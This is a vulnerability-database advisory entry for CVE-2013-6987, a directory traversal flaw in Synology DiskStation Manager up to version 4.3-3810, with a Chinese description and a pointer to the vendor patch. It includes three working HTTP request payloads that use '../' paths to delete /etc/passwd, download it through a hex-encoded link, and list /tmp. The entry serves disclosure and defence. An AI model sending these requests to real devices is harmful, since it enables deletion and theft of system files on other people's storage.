Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:61204
HistoryDec 25, 2013 - 12:00 a.m.

Synology DSM目录遍历漏洞

2013-12-2500:00:00
Root
www.seebug.org
548

0.008 Low

EPSS

Percentile

81.8%

JSON

CVE ID:CVE-2013-6987

Synology DiskStation Manager 是第一个提供网络多任务处理用户接口的NAS操作系统。

Synology DSM目录遍历漏洞漏洞允许任何身份验证的用户访问,创建,删除,修改系统文件和配置文件。
0
Synology DSM <= 4.3-3810
Synology

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http:// www.synology.com


                                                Following some examples (&quot;test&quot; is a valid folder name):
 
- Delete /etc/passwd
===========================================
POST /webapi/FileStation/file_delete.cgi HTTP/1.1
Host: 192.168.56.101:5000
X-SYNO-TOKEN: XXXXXXXX
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 103
Cookie: stay_login=0; id=kjuYI0HvD92m6
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
 
path=/test/../../etc/passwd&amp;accurate_progress=true&amp;api=SYNO.FileStation.Delete&amp;method=start&amp;version=1
===========================================
 
- Arbitrary file download:
===========================================
GET /fbdownload/?dlink=2f746573742f2e2e2f2e2e2f6574632f706173737764 HTTP/1.1
Host: 192.168.56.101:5000
Connection: keep-alive
Authorization: Basic XXXXXXXX
===========================================
 
2f746573742f2e2e2f2e2e2f6574632f706173737764 -&gt; /test/../../etc/passwd
 
- Remote file list:
=========================
POST /webapi/FileStation/file_share.cgi HTTP/1.1
Host: 192.168.56.101:5000
X-SYNO-TOKEN: XXXXXXXX
Content-Length: 75
Cookie: stay_login=0; id=f9EThJSyRaqJM; BCSI-CS-36db57a1c38ce2f6=2
 
folder_path=/test/../../tmp&amp;api=SYNO.FileStation.List&amp;method=list&amp;version=1

Related

cve 1
nvd 1
packetstorm 1
nessus 1
zdt 1
cvelist 1
prion 1
securityvulns 2
cve
cve
CVE-2013-6987
2013-12-31 16:04:23
nvd
nvd
CVE-2013-6987
2013-12-31 16:04:23
packetstorm
packetstorm
Synology DSM 4.3-3810 Directory Traversal
2013-12-23 00:00:00
nessus
nessus
Synology DiskStation Manager < 4.3-3810 Update 3 Multiple FileBrowser Component Directory Traversal Vulnerabilities
2014-02-05 00:00:00
zdt
zdt
Synology DSM 4.3-3810 - Directory Traversal
2013-12-24 00:00:00
cvelist
cvelist
CVE-2013-6987
2013-12-31 15:00:00
prion
prion
Directory traversal
2013-12-31 16:04:00
securityvulns
securityvulns
Synology DiskStation Manager code execution
2014-03-27 00:00:00
CVE-2013-6955 Synology DSM remote code execution
2014-03-27 00:00:00

0.008 Low

EPSS

Percentile

81.8%

JSON
Related for SSV:61204
cve1nvd1packetstorm1nessus1zdt1cvelist1prion1securityvulns2